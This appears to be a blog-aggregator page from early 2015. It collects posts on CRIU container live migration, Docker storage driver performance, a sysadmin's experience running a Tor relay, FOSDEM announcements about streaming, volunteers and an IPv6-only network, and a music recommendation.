The post Live Migrations for Containers with CRIU appeared first on ma.ttias.be.

At Fosdem there was a talk about live migrations for containers, using CRIU (Checkpoint/Restore in User-Space).

CRIO comes from the OpenVZ container space, which is backed by Parallels (makers of Virtuozzo, Plesk, ...).

Checkpoint/Restore In Userspace, or CRIU (pronounced kree-oo, IPA: /krɪʊ/, Russian: криу), is a software tool for Linux operating system. Using this tool, you can freeze a running application (or part of it) and checkpoint it to a hard drive as a collection of files. You can then use the files to restore and run the application from the point it was frozen at. The distinctive feature of the CRIU project is that it is mainly implemented in user space.
CRIO

If you're interested in migration containers "live" (well, sort-of live, with a small hickup during the freeze), keep an eye on this project.

CRIU is already used in the latest version of OpenVZ.

How it works seems dangerous or magical (whichever term you prefer), as it injects code into the running containers to be able to get a dump of the state of the container. The Wiki has an example on how CRIU works with a simple bash loop inside a container.

There are some caveats that can occur after a checkpoint / restore that you should be aware of. And there are a variety of resources that cannot be checkpointed inside a container. In order to resume TCP connections, at least kernel 3.5 is needed for the TCP_REPAIR support.

CRIU is not yet integrated into Docker, but that should be only a matter of time.

Are there alternative solutions to the whole live migration of containers issue?

The post Live Migrations for Containers with CRIU appeared first on ma.ttias.be.

by Mattias Geniar at February 01, 2015 09:34 AM

Docker Storage Performance Tests

The post Docker Storage Performance Tests appeared first on ma.ttias.be.

homepage-docker-logo

Red Hat has published two very interesting blogposts concerning the performance of Docker, and more specifically -- the storage drivers available. They're over 6 months old, but still relevant and mentioned in this weekends' Fosdem talks.

Which storage driver are you using?

You can use docker info to find out.

$ docker info
Containers: 21
Images: 47
...
Storage Driver: aufs
 Root Dir: /var/lib/docker/aufs
 Dirs: 89
...

The "Storage Driver" section contains all your info. In my case, it's using aufs because the aufs-tools package is installed. After the install, Docker will magically start to use the aufs driver for your docker containers.

Storage "Graph" Driver performance tests

Docker users can chose between devicemapper, vfs, aufs, btrfs and OverlayFS (kernel 3.18+) for their storage driver. Each having their own pro's and con's. So which to pick?

The Red Hat blogpost "Comprehensive Overview of Storage Scalability in Docker" has some very interesting stats on each of those drivers. I suggest having a look at it when implementing Docker in your environment.

Docker performance on RHEL 7

A month earlier, Red Hat published another blogpost on the docker performance on their RHEL7 platform. This led to a presentation they shared on Youtube.

Again, a recommendation if you're going to give Docker a try.

The post Docker Storage Performance Tests appeared first on ma.ttias.be.

by Mattias Geniar at February 01, 2015 08:51 AM

January 30, 2015

Mattias Geniar

Running a Tor relay: lessons learned

The post Running a Tor relay: lessons learned appeared first on ma.ttias.be.

Mozilla recently announced they'll be running their own Tor relays to support the Tor project.

As an experiment, I added a Tor relay (not an exit node, I had no interest in dealing with complaints/abuse reports) to my own server a few weeks earlier, to see what kind of traffic it would/could do.

After the initial setup, your relay goes through a "learning period" of a few days, where your relay is evaluated. If it's stable, it'll receive more data along the way. After a few days, it was already peaking to > 80Mbps (around 8MB/s). This was faster than I had anticipated, so I killed the relay shortly after and it's no longer running at this point.

tor_relay_bandwidth

In terms of CPU, this was a very low-end server and it peaked to around 30% when it was pushing around 80Mbps.

tor_relay_cpu

The top 10 relay list in the Tor Globe shows the most active relay is pushing more than 130MB/s in traffic, so a 1Gbps connection being completely saturated.

I considered this an experiment, to see what technical hurdles are involved in setting up a tor relay, how it works from a technical point of view, what happen to your server, ... Technically, it's super easy to set up. Pre-made packages are available, configs are explained and up-to-date setup guides are present.

But as a sysadmin for a hosting provider, I must admit I have mixed feelings about the Tor project. On the one hand, I love the ideal of Tor, of allowing users anonymous access to the public internet. Especially if your government is limiting freedom of speech by filtering the internet. But as a sysadmin, I more often see the negative aspects of traffic relayed through Tor: low-bandwidth denial of service attacks, SQL injection attacks, online abuse, harassment, ...

It's so easy to run everything through Tor as a client that it's being abused more and more by "attackers". Site reconnaissance, executing attacks on vulnerable content management systems, ... a lot of scriptkiddie tools have Tor support built-in, to make it even easier.

So while I appreciate Tor from a distance, I won't be running a Tor relay again any time soon.

The post Running a Tor relay: lessons learned appeared first on ma.ttias.be.

by Mattias Geniar at January 30, 2015 04:54 PM

FOSDEM organizers

Recording and streaming mostly working!

As pointed out during the opening talk, we have a completely new recording and streaming workflow this year. After some teething problems this morning, we're happy to report that most things are now working! Unfortunately, we were not able to record or stream the opening presentation and the first part of Karen Sandler's Identity Crisis keynote. Our video team and network team are working hard to fix the remaining teething problems and we hope to be able to have everything working smoothly in very short order. Keep an eye on https://live.fosdem.org/ for streams! Note that even if the streams舰

January 30, 2015 03:00 PM

FOSDEM needs you!

We would really like some more volunteers, particularly for crowd control and infodesk duty (selling t-shirts, being helpful, etc). If you have some spare energy, the FOSDEM team would really appreciate some more volunteers to help out particularly with crowd control and selling t-shirts at the infodesk. Please report to the infodesk in the K building (ask for Koert!) to claim a bright orange t-shirt and help us make FOSDEM even better!

January 30, 2015 03:00 PM

IPv6-only wireless network again!

Last year we turned off IPv4 on our main FOSDEM wireless network. They idea is to confront developers with the IPv6-reality and encourage them to fix bugs. Progress has been made, but there is a lot of work left to do! FOSDEM is a unique opportunity to confront thousands of developers with an IPv6-only reality. We are hopeful that making our default network IPv6-only will encourage people to fix bugs in applications and devices. The FOSDEM network has NAT64 and DNS64 transition measures in place for communicating with the legacy internet. For those who need it, the FOSDEM-legacy wireless舰

January 30, 2015 03:00 PM

Frank Goossens

Music from Our Tube: Uncle Tupelo – Sandusky

Before Jeff Tweedy went solo he was at Wilco and even before that he was in Uncle Tupelo. This is a nice little gem of an instrumental from back in those days:

YouTube Video
Watch this video on YouTube or on Easy Youtube.

by frank at January 30, 2015 05:54 AM